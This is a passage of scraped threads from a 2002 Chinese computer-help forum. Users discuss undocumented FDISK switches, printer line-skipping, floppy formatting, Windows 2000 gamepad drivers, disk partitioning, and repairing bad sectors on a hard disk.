 发表于 2002-02-11 00:00:23 按此观看ImHow的个人资料 按此发邮件给ImHow 访问ImHow的主页 ImHow 的 oicq 是16407971,查看 16407971 的资料 收藏该主题供以后查看 发送悄悄话给ImHow 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看ImHow的IP
/STATUS
参数功能：显示分割状况
参数详解：当延伸分割区里没有逻辑磁盘时, 延伸分割区不会被显示出来

/MBR
参数功能：重建第一颗硬盘的主激活程序 (Master Boot Record)
参数详解：当有病毒感染 MBR 时, 用来清除病毒相当好用

/PRI
参数功能：建立主分割区, 并设定为激活
参数详解：在硬盘上建立大小为的主分割区. 分割区会被设定为激活分割区

/PRIO
参数功能：使用 FAT16 建立主分割区并设定为激活

/EXT
参数功能：建立延伸分割区
参数详解：在硬盘上建立大小为的延伸分割区 (用来建立逻辑磁盘)

/LOG
参数功能：建立逻辑磁盘
参数详解：用 /LOG 来建立大小为的逻辑磁盘. /LOG 必须和 /EXT 同时使用

/LOGO
参数功能：使用 FAT16 建立逻辑磁盘

/FPRMT
参数功能：在交谈模式中询问 FAT16/FAT32 的使用
参数详解：当加上 /FPRMT 参数时不会出现开始的大容量硬盘支持的询问画面, 而是在每次建立一个新的分割时询问使用 FAT16 或 FAT32

/Q
参数功能：结束 FDISK 时不重新激活计算机
参数详解：使用 /Q 参数将不会在更动分割表后重新激活计算机

/X
参数功能：不使用 LBA 属性
参数详解：使用 /X 参数将不会产生带有 LBA 属性的分割

/ACTOK
参数功能：不检查硬盘的良好度
参数详解：用 /ACTOK 参数可以不检查硬盘良好度而加快分割动作

/CMBR
参数功能：重建指定硬盘的主激活程序
参数详解：动作同 /MBR, 但可以指定硬盘

::古落根门::

唯有不断学习 才能不断进步

xqlyg

超级用户
积分：362
发帖：92
来自：china
注册：2002-02-07
 发表于 2002-02-11 22:30:58 按此观看xqlyg的个人资料 按此发邮件给xqlyg xqlyg 的 oicq 是41770172,查看 41770172 的资料 发送悄悄话给xqlyg 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看xqlyg的IP
谢谢了
不过现在用他的人还多吗
dancing

叶恨花
现任版主
积分：4737
发帖：2230
来自：|二进制情感天空|
注册：2000-12-11
 发表于 2002-02-11 22:34:16 按此观看dancing的个人资料 按此发邮件给dancing 发送悄悄话给dancing 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看dancing的IP
xqlyg在上个帖子中说
引用:
谢谢了
不过现在用他的人还多吗

很好阿，我上午还刚用了，像这种底层操作的东西还是Dos下的用着放心，不会有冗余数据，分区大师那种不损害数据的只是在某些情况下便于操作，也是趋势，但不是什么时候都能帮到我们的哈！

情归秋雪缠绵叶，恨是西风寂寞花。最痛处，别后离愁… …

Blueidea Web Team
Moderator Of Photoshop & Imagerady Forum

ImHow

怎样
积分：2446
发帖：648
来自：::HowHome::
注册：2002-01-16
 发表于 2002-02-11 22:36:18 按此观看ImHow的个人资料 按此发邮件给ImHow 访问ImHow的主页 ImHow 的 oicq 是16407971,查看 16407971 的资料 发送悄悄话给ImHow 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看ImHow的IP
装新的硬盘就需要了啊

::古落根门::

唯有不断学习 才能不断进步

onlysnake

终级用户
积分：2127
发帖：739
来自：经典_流氓屯
注册：2002-01-10
 发表于 2002-02-11 22:39:01 按此观看onlysnake的个人资料 按此发邮件给onlysnake onlysnake 的 oicq 是24394523,查看 24394523 的资料 发送悄悄话给onlysnake 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看onlysnake的IP
是呀，是呀，
用我的话说：

最原始的，也是最经典的！

我在天空写下你的名字，但是被风带走了；我在沙滩写下你的名字，但是被浪花带走了；于是，我在大街上的每个角落写下你的名字，…………·#！￥%—*+但是，我被警察带走了！！

Blueidea Counter Strike Team
=Blueidea=onlysnake

xqlyg

超级用户
积分：362
发帖：92
来自：china
注册：2002-02-07
 发表于 2002-02-11 22:52:59 按此观看xqlyg的个人资料 按此发邮件给xqlyg xqlyg 的 oicq 是41770172,查看 41770172 的资料 发送悄悄话给xqlyg 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看xqlyg的IP
对对，原始的好。我也喜欢但是就是很慢没有用dm快。
sky2000

终级用户
积分：2258
发帖：849
来自：WuHan.CN
注册：2001-01-22
 发表于 2002-02-12 01:28:01 按此观看sky2000的个人资料 按此发邮件给sky2000 sky2000 的 oicq 是6256954,查看 6256954 的资料 发送悄悄话给sky2000 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看sky2000的IP
very good ,
对了，xqlyg 那里有dm可以下载呀？

I Love This !
Biketrial football basketball music......
..:::sky2000.tk:::..
xqlyg

超级用户
积分：362
发帖：92
来自：china
注册：2002-02-07
 发表于 2002-02-12 09:09:55 按此观看xqlyg的个人资料 按此发邮件给xqlyg xqlyg 的 oicq 是41770172,查看 41770172 的资料 发送悄悄话给xqlyg 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看xqlyg的IP
在这里有下的。
http://nj.onlinedown.net/dmwyb.htm
上一贴 | 下一贴
快速回复 主题：FDISK的未公开参数详解
显示名字： 啸 [ 退出 ]
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:
[html]……[/html]


富士通 DPK 8400E - 经 典 论 坛

计算机技术
富士通　DPK 8400E

上一贴 | 下一贴
发表人 | 主题: 富士通 DPK 8400E
robbit 初级用户 积分：31 发帖：11 来自：湖北省荆州市沙市区 注册：2001-07-13 | 发表于 2002-02-18 20:37:43 按此观看robbit的个人资料 按此发邮件给robbit robbit 的 oicq 是4925353,查看 4925353 的资料 收藏该主题供以后查看 发送悄悄话给robbit 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看robbit的IP 一台该型号的打印机打印总喜欢跳行． 在纯DOS 7 + UCDOS 7.0 下用金税系统打发票总要试打第一张，且绝对跳一行，然后再开始连续打印才正常，且打到一定的张数后（毫无规律）跳不定的行数． 在win98（用win98自带1600K驱动）下共享给其他机器打EMS信封，有时进纸老跑个不停直到末尾．打印也不定时跳行． 换过打印线,也换过同型号打印机，网络正常，同时换过机器但不换硬盘．机器都正常．C466 & PII350,Asus & Gigabyte BX,QT LCT 10G,Samsung & D-Link 10/100M,Riva 128ZX & 9750． 帮帮忙各位！！ I am Robbit Yoyo. ゎたしは さぃなんです。
QUESTER 鼠标说话 是个版主 积分：2790 发帖：1293 来自：GTA 注册：2000-08-28 | 发表于 2002-02-19 00:14:22 按此观看QUESTER的个人资料 按此发邮件给QUESTER 发送悄悄话给QUESTER 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看QUESTER的IP 首先检查该机器的进纸系统的问题，然后是检查页面设置是否正确。 再：win98自带的驱动有时不能和某些型号打印机匹配正常，去下载该机型新的打印机驱动就可以了。 可以看看这个： Fujitsu富士通DPK系列打印机驱动程序（2001年9月12日新增） 本驱动所配DPK打印驱动程序，是南京富士通计算机设备有限公司为其DPK系列针式打印机(36，96，93，8x系列等)开发的专用驱动程序。适用于EPSON LQ1600K的仿真模式，在Microsoft公司的Windows图形用户系统(包括Win3.x,但以Win95为主)下安装、使用有效。其主要目的是解决Windows系统原自带的EPSON LQ1600k打印驱动程序不能双向打印的问题(某些Win3.x版本有例外)，而本程序已实现此功能，可较大幅度的提高打印速度，减少打印时等待的时间，提高用户的工作效率。驱动另还配有OKI打印驱动程序，适用于MS.Windows系统下使用OKI5320仿真的针式打印机。(DPK系列打印机带有OKI的仿真模式选择，可根据用户需要在机器面板上设置) 下载 ColorKey 试用版 解决配色问题 逢对手鼠标说话，仗一键快意恩仇！ ...大象无形 大音稀声... Blueidea Web Team Moderator of Art & Design
上一贴 | 下一贴
快速回复 主题：富士通　DPK 8400E
显示名字： 啸 [ 退出 ]
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:
[html]……[/html]
显示签名 禁止笑脸转换

管理选项： 关闭主题 | 置于顶部 | 移动/归档 | 删除主题

跳转到:

dreamweaver MX 功能探索


软盘无法格式化 - 经 典 论 坛

计算机技术
软盘无法格式化

上一贴 | 下一贴
发表人 主题: 软盘无法格式化
yoam

初级用户
积分：24
发帖：7
来自：
注册：2002-02-22
 发表于 2002-02-22 10:04:35 按此观看yoam的个人资料 该用户不允许显示它的电子邮件 收藏该主题供以后查看 发送悄悄话给yoam 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看yoam的IP
进行格式化时弹出窗口磁盘容量不符，请教。
kirsten9

终级用户
积分：532
发帖：174
来自：冷冷的山脊
注册：2001-07-13
 发表于 2002-02-22 10:22:58 按此观看kirsten9的个人资料 该用户不允许显示它的电子邮件 访问kirsten9的主页 kirsten9 的 oicq 是18348795,查看 18348795 的资料 发送悄悄话给kirsten9 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看kirsten9的IP
先进入ms-dos mode，再format a:/u

如果不行，软盘应该是烂掉了

{ KUka ALl wAYs wITh yOU }
imacwei

终级用户
积分：2348
发帖：1078
来自：China.Jiangs
注册：2001-07-23
 发表于 2002-02-22 10:55:11 按此观看imacwei的个人资料 按此发邮件给imacwei 访问imacwei的主页 imacwei 的 oicq 是36110975,查看 36110975 的资料 发送悄悄话给imacwei 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看imacwei的IP
使用额外的工具，比如HD-Copy

Loading…………
WINDOWS2000-SP2+IE5.5
FIREWORKS,the solution for professional Web graphic design and production.
Press Anykey To Continue…

iMacWei
onlysnake

终级用户
积分：2127
发帖：739
来自：经典_流氓屯
注册：2002-01-10
 发表于 2002-02-22 12:06:31 按此观看onlysnake的个人资料 按此发邮件给onlysnake onlysnake 的 oicq 是24394523,查看 24394523 的资料 发送悄悄话给onlysnake 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看onlysnake的IP
是不是你的软驱有毛病！

我在天空写下你的名字，但是被风带走了；我在沙滩写下你的名字，但是被浪花带走了；于是，我在大街上的每个角落写下你的名字，…………·#！￥%—*+但是，我被警察带走了！！

Blueidea Counter Strike Team
=Blueidea=onlysnake

yoam

初级用户
积分：24
发帖：7
来自：
注册：2002-02-22
 发表于 2002-02-22 13:17:26 按此观看yoam的个人资料 该用户不允许显示它的电子邮件 发送悄悄话给yoam 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看yoam的IP
kirsten9在上个帖子中说
引用:
先进入ms-dos mode，再format a:/u

如果不行，软盘应该是烂掉了

问题解决，谢谢。

上一贴 | 下一贴
快速回复 主题：软盘无法格式化
显示名字： 啸 [ 退出 ]
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:
[html]……[/html]


WIN2000真的不支持并口手柄驱动吗 - 经 典 论 坛

计算机技术
WIN2000真的不支持并口手柄驱动吗

上一贴 | 下一贴
发表人 主题: WIN2000真的不支持并口手柄驱动吗
JILL

终级用户
积分：590
发帖：180
来自：沈阳市
注册：2001-12-10
 发表于 2002-02-23 13:03:43 按此观看JILL的个人资料 按此发邮件给JILL JILL 的 oicq 是33475686,查看 33475686 的资料 收藏该主题供以后查看 发送悄悄话给JILL 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看JILL的IP
WIN2000真的不支持并口手柄驱动吗

誓与WIN2000共存
kirsten9

终级用户
积分：532
发帖：174
来自：冷冷的山脊
注册：2001-07-13
 发表于 2002-02-23 13:07:36 按此观看kirsten9的个人资料 该用户不允许显示它的电子邮件 访问kirsten9的主页 kirsten9 的 oicq 是18348795,查看 18348795 的资料 发送悄悄话给kirsten9 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看kirsten9的IP
支持

{ KUka ALl wAYs wITh yOU }
JILL

终级用户
积分：590
发帖：180
来自：沈阳市
注册：2001-12-10
 发表于 2002-02-23 13:12:30 按此观看JILL的个人资料 按此发邮件给JILL JILL 的 oicq 是33475686,查看 33475686 的资料 发送悄悄话给JILL 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看JILL的IP
我的WIN2000的手驱动安不上
请问如何装
手柄是一托二的那种

誓与WIN2000共存
kirsten9

终级用户
积分：532
发帖：174
来自：冷冷的山脊
注册：2001-07-13
 发表于 2002-02-23 13:17:06 按此观看kirsten9的个人资料 该用户不允许显示它的电子邮件 访问kirsten9的主页 kirsten9 的 oicq 是18348795,查看 18348795 的资料 发送悄悄话给kirsten9 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看kirsten9的IP
你是怎么安装的？

{ KUka ALl wAYs wITh yOU }
JILL

终级用户
积分：590
发帖：180
来自：沈阳市
注册：2001-12-10
 发表于 2002-02-23 13:24:24 按此观看JILL的个人资料 按此发邮件给JILL JILL 的 oicq 是33475686,查看 33475686 的资料 发送悄悄话给JILL 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看JILL的IP
面板
游戏控制器

誓与WIN2000共存
kirsten9

终级用户
积分：532
发帖：174
来自：冷冷的山脊
注册：2001-07-13
 发表于 2002-02-23 13:29:43 按此观看kirsten9的个人资料 该用户不允许显示它的电子邮件 访问kirsten9的主页 kirsten9 的 oicq 是18348795,查看 18348795 的资料 发送悄悄话给kirsten9 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看kirsten9的IP
没错，哪里不行了？

{ KUka ALl wAYs wITh yOU }
jorkof

终级用户
积分：1200
发帖：368
来自：北京
注册：2001-06-16
 发表于 2002-02-23 14:51:15 按此观看jorkof的个人资料 按此发邮件给jorkof 访问jorkof的主页 jorkof 的 oicq 是3707274,查看 3707274 的资料 发送悄悄话给jorkof 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看jorkof的IP
好像有这样的驱动下载吧,你去一些模拟器的网站看看吧

≮曾经沧海难为水jorkof.my163.com除却巫山不是云≯
浸食·花葬

极度色郎
积分：7812
发帖：2959
来自：|翅膀|
注册：2001-07-09
 发表于 2002-02-23 14:57:37 按此观看浸食·花葬的个人资料 按此发邮件给浸食·花葬 访问浸食·花葬的主页 浸食·花葬 的 oicq 是7368317,查看 7368317 的资料 发送悄悄话给浸食·花葬 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看浸食·花葬的IP

我的振动usb受柄在me下玩的好好的 到2000下就不行了 气死

幕末 ——
京都に人斬り拔刀齋と呼ばれた志士がぃた.
修羅さながらに人を斬り.その血刀を以って新
時代『明治』を切り拓ぃたその男は.動亂の
終結と共に人々の前から姿を消した ——
jorkof

终级用户
积分：1200
发帖：368
来自：北京
注册：2001-06-16
 发表于 2002-02-23 15:00:35 按此观看jorkof的个人资料 按此发邮件给jorkof 访问jorkof的主页 jorkof 的 oicq 是3707274,查看 3707274 的资料 发送悄悄话给jorkof 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看jorkof的IP
浸食·花葬在上个帖子中说
引用:

我的振动usb受柄在me下玩的好好的 到2000下就不行了 气死

怎么?连USB的也不灵了?

≮曾经沧海难为水jorkof.my163.com除却巫山不是云≯
JILL

终级用户
积分：590
发帖：180
来自：沈阳市
注册：2001-12-10
 发表于 2002-02-23 17:23:13 按此观看JILL的个人资料 按此发邮件给JILL JILL 的 oicq 是33475686,查看 33475686 的资料 发送悄悄话给JILL 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看JILL的IP
谁来解决一下啊

誓与WIN2000共存
JILL

终级用户
积分：590
发帖：180
来自：沈阳市
注册：2001-12-10
 发表于 2002-02-23 17:24:37 按此观看JILL的个人资料 按此发邮件给JILL JILL 的 oicq 是33475686,查看 33475686 的资料 发送悄悄话给JILL 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看JILL的IP
用串口的手柄可吗

誓与WIN2000共存
JILL

终级用户
积分：590
发帖：180
来自：沈阳市
注册：2001-12-10
 发表于 2002-02-23 17:26:46 按此观看JILL的个人资料 按此发邮件给JILL JILL 的 oicq 是33475686,查看 33475686 的资料 发送悄悄话给JILL 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看JILL的IP
对了
版主
拉兄弟一把

誓与WIN2000共存
话草

终级用户
积分：688
发帖：223
来自：
注册：2001-08-07
 发表于 2002-02-24 12:56:02 按此观看话草的个人资料 按此发邮件给话草 话草 的 oicq 是27721384,查看 27721384 的资料 发送悄悄话给话草 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看话草的IP
这个问题我回答过了

你最好搜索一下，

对于改制的并口PS手柄，需要NTPAD122驱动 ， 2000和xp下都可以用

onlysnake

终级用户
积分：2127
发帖：739
来自：经典_流氓屯
注册：2002-01-10
 发表于 2002-02-24 17:32:17 按此观看onlysnake的个人资料 按此发邮件给onlysnake onlysnake 的 oicq 是24394523,查看 24394523 的资料 发送悄悄话给onlysnake 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看onlysnake的IP
很简单呀，
到各大模拟器网站去下载一个不就行了！

我在天空写下你的名字，但是被风带走了；我在沙滩写下你的名字，但是被浪花带走了；于是，我在大街上的每个角落写下你的名字，…………·#！￥%—*+但是，我被警察带走了！！

Blueidea Counter Strike Team
=Blueidea=onlysnake

DayinNightout

超级用户
积分：345
发帖：152
来自：CCF
注册：2000-12-18
 发表于 2002-02-24 20:59:58 按此观看DayinNightout的个人资料 按此发邮件给DayinNightout 发送悄悄话给DayinNightout 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看DayinNightout的IP
话草在上个帖子中说
引用:
这个问题我回答过了

你最好搜索一下，

对于改制的并口PS手柄，需要NTPAD122驱动 ， 2000和xp下都可以用

阿,,,,,,,,,,,,,,请问那里有你说的这个驱动呢???

木有签名#@$%
jill

终级用户
积分：590
发帖：180
来自：沈阳市
注册：2001-12-10
 发表于 2002-02-24 21:12:52 按此观看jill的个人资料 按此发邮件给jill jill 的 oicq 是33475686,查看 33475686 的资料 发送悄悄话给jill 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看jill的IP
话草在上个帖子中说
引用:
这个问题我回答过了

你最好搜索一下，

对于改制的并口PS手柄，需要NTPAD122驱动 ， 2000和xp下都可以用

请问是哪个网站

誓与WIN2000共存
话草

终级用户
积分：688
发帖：223
来自：
注册：2001-08-07
 发表于 2002-02-24 21:15:42 按此观看话草的个人资料 按此发邮件给话草 话草 的 oicq 是27721384,查看 27721384 的资料 发送悄悄话给话草 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看话草的IP
好吧，再贴一次

点这里下载

自己装，支持双手柄 [image] 好好玩一把

jill

终级用户
积分：590
发帖：180
来自：沈阳市
注册：2001-12-10
 发表于 2002-02-24 21:20:38 按此观看jill的个人资料 按此发邮件给jill jill 的 oicq 是33475686,查看 33475686 的资料 发送悄悄话给jill 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看jill的IP
连接不上啊

誓与WIN2000共存
话草

终级用户
积分：688
发帖：223
来自：
注册：2001-08-07
 发表于 2002-02-24 21:28:19 按此观看话草的个人资料 按此发邮件给话草 话草 的 oicq 是27721384,查看 27721384 的资料 发送悄悄话给话草 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看话草的IP
好了，修复了
jill

终级用户
积分：590
发帖：180
来自：沈阳市
注册：2001-12-10
 发表于 2002-02-24 21:29:26 按此观看jill的个人资料 按此发邮件给jill jill 的 oicq 是33475686,查看 33475686 的资料 发送悄悄话给jill 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看jill的IP
能给个地址吗？
多谢多谢

誓与WIN2000共存
jill

终级用户
积分：590
发帖：180
来自：沈阳市
注册：2001-12-10
 发表于 2002-02-24 21:31:39 按此观看jill的个人资料 按此发邮件给jill jill 的 oicq 是33475686,查看 33475686 的资料 发送悄悄话给jill 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看jill的IP
收到了
哈哈
心中大病去了

誓与WIN2000共存
话草

终级用户
积分：688
发帖：223
来自：
注册：2001-08-07
 发表于 2002-02-24 21:32:22 按此观看话草的个人资料 按此发邮件给话草 话草 的 oicq 是27721384,查看 27721384 的资料 发送悄悄话给话草 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看话草的IP
你点击下载就可以了，或者右键另存为
上一贴 | 下一贴
快速回复 主题：WIN2000真的不支持并口手柄驱动吗
显示名字： 啸 [ 退出 ]
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:
[html]……[/html]
显示签名 禁止笑脸转换

管理选项： 关闭主题 | 置于顶部 | 移动/归档 | 删除主题

跳转到:

经典论坛 PS版与艺设版 联合举办 『设计四连击』 设计接龙


大硬盘应该怎样分区? - 经 典 论 坛

dreamweaver MX 功能探索

计算机技术
大硬盘应该怎样分区?

上一贴 | 下一贴
发表人 主题: 大硬盘应该怎样分区?
话草

终级用户
积分：688
发帖：223
来自：
注册：2001-08-07
 发表于 2002-03-01 21:52:55 按此观看话草的个人资料 按此发邮件给话草 话草 的 oicq 是27721384,查看 27721384 的资料 收藏该主题供以后查看 发送悄悄话给话草 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看话草的IP
现在很多朋友用上了20G以上的大硬盘，对于这些大硬盘，如何分区才能发挥它们的高效能呢？

若只安装一个系统，如winme

首先分出一个系统区，大小为2G （若是WINXP，建议为3G），这个区只装系统文件

接着分出一个磁盘缓存区，大小为2G， 这个区专放虚拟内存（大小为物理内存的1.5到2倍） ，另外将系统默认的TEMP 和TMP文件夹（还有IE的临时文件夹）移动到此分区 ， 这样做的目的是方便碎片的统一整理

接着分出一个软件区5G ， 装常用软件足够了

接下来的空间就睡意了，你可以对半分

关键是系统区，磁盘缓存区，程序文件区，这三个区要分开，这样方便管理，无论是软件系统还是硬件都能得到较好的利用

若是安装多系统同样遵守以上原则可以获得较大的系统效能，只不过你的硬盘容量要更大点才好 ( 个人认为60G 不够用 [image] )

以上个人体会 ， 仅供参考 ， 请大家批评指正

ImHow

怎样
积分：2446
发帖：648
来自：::HowHome::
注册：2002-01-16
 发表于 2002-03-01 22:34:55 按此观看ImHow的个人资料 按此发邮件给ImHow 访问ImHow的主页 ImHow 的 oicq 是16407971,查看 16407971 的资料 发送悄悄话给ImHow 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看ImHow的IP
如果软件装在其他盘的话，那么用ghost就要备份两个区了啊，好像有点麻烦哦

::古落根门::

唯有不断学习 才能不断进步

onlysnake

终级用户
积分：2127
发帖：739
来自：经典_流氓屯
注册：2002-01-10
 发表于 2002-03-01 23:06:04 按此观看onlysnake的个人资料 按此发邮件给onlysnake onlysnake 的 oicq 是24394523,查看 24394523 的资料 发送悄悄话给onlysnake 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看onlysnake的IP
我觉得前两个区都分5G，后面的可以稍微大点！
具体情况再看！

我在天空写下你的名字，但是被风带走了；我在沙滩写下你的名字，但是被浪花带走了；于是，我在大街上的每个角落写下你的名字，…………·#！￥%—*+但是，我被警察带走了！！

Blueidea Counter Strike Team
=Blueidea=onlysnake

话草

终级用户
积分：688
发帖：223
来自：
注册：2001-08-07
 发表于 2002-03-02 11:53:12 按此观看话草的个人资料 按此发邮件给话草 话草 的 oicq 是27721384,查看 27721384 的资料 发送悄悄话给话草 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看话草的IP
ImHow在上个帖子中说
引用:
如果软件装在其他盘的话，那么用ghost就要备份两个区了啊，好像有点麻烦哦

软件装在 系统区的 是一大忌

你专门装在一个区， 即使系统崩溃，从装后这些软件大部分可用，而且全动成了绿色软件，根本用不到ghost

ImHow

怎样
积分：2446
发帖：648
来自：::HowHome::
注册：2002-01-16
 发表于 2002-03-03 11:06:20 按此观看ImHow的个人资料 按此发邮件给ImHow 访问ImHow的主页 ImHow 的 oicq 是16407971,查看 16407971 的资料 发送悄悄话给ImHow 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看ImHow的IP
但也只是大部分的，而且运行时没有注册表中的键值与其关联，会不会造成系统不稳定呢

::古落根门::

唯有不断学习 才能不断进步

上一贴 | 下一贴
快速回复 主题：大硬盘应该怎样分区?
显示名字： 啸 [ 退出 ]
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:
[html]……[/html]


硬盘坏道修复术 - 经 典 论 坛

计算机技术
硬盘坏道修复术

上一贴 | 下一贴
发表人 主题: 硬盘坏道修复术
话草

终级用户
积分：688
发帖：223
来自：
注册：2001-08-07
 发表于 2002-03-07 20:21:54 按此观看话草的个人资料 按此发邮件给话草 话草 的 oicq 是27721384,查看 27721384 的资料 收藏该主题供以后查看 发送悄悄话给话草 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看话草的IP
硬盘有了坏道后的种种现象：

    1.读取某个文件或运行某个软件时经常出错，或者要经过很长时间才能操作成功，其间硬盘不断读盘并发出刺耳的杂音，这种现象意味着硬盘上载有数据的某些扇区已坏。

    2.开机时系统不能通过硬盘引导，软盘启动后可以转到硬盘盘符，但无法进入，用SYS命令传导系统也不能成功。这种情况比较严重，因为很有可能是硬盘的引导扇区出了问题。

    3.正常使用计算机时频繁无故出现蓝屏。

    对于前面3种情况，我们一般都有办法作或多或少地补救。以下提供了几种方法来对硬盘的坏道作修复，要注意的是，应该优先考虑排在前面的方法。

    1.首先从最简单的方法入手。在Windows98的资源管理器中选择硬盘盘符，右击鼠标，在快捷菜单中选择 “属性”，在“工具”项中对硬盘盘面作完全扫描处理，并且对可能出现的坏簇作自动修正。对于以上第2种情况即不能进入 Windows98的现象，则可以用Windows98的启动盘引导机器，然后在“A：>”提示符后键入“scand isk X：”来扫描硬盘，其中“X”是具体的硬盘盘符。对于坏簇，程序会以黑底红字的“B”（bad）标出。

    2.实际上，第1种方法往往不能奏效，因为Windows98对“坏道”的自动修复很大程度上是对逻辑坏道而言，而不能自动修复物理坏道，所以有必要考虑对这些坏道作“冷处理”。所谓“冷处理”就是在这些坏道上作标记，不去使用，惹不起还躲得起。记住第1种方法中坏道的位置，然后把硬盘高级格式化，将有坏道的区域划成一个区，以后就不要在这个区上存取文件了。要说明的是，不要为节约硬盘空间而把这个区划得过分“经济”，而应留有适当的余地，因为读取坏道周围的“好道”是不明智的--坏道具有蔓延性，如果动用与坏道靠得过分近的“好道”，那么过不了多久，硬盘上新的坏道又将出现。

    3.用一些软件对硬盘作处理，其中最典型的是PartitionMagic了。这里以5.0版本为例：扫描硬盘可以直接用PartitionMagic4中的“check”命令来完成，但该命令无自动修复功能，所以最好在Pa rtitionMagic5中调用Windows98的相关程序来完成这个任务。标记了坏簇后，可以尝试着对它进行重新测试，方法是在Operations菜单下选择“Advanced/bad Sector Retest”；把坏簇分成一个（或多个）区后，可以考虑把该区隐藏，以免在Windows98中误操作，这个功能是通过Hide Part ition菜单项来实现的。要特别注意的是，如果没有经过格式化而直接将有坏簇的分区隐藏的话，那么该分区的后续分区将由于盘符的变化而导致其中的一些与盘符有关的程序不能正确运行，比如一些软件在桌面上建立的快捷方式将找不到宿主程序，解决之道是利用Tools菜单下的DriveMapper菜单项，它会自动地收集快捷方式和注册表内的相关信息，并对它们作正确的修改。特别指出的是，在较新版的PartitionMagic5.0 Pro中，DriveMapp 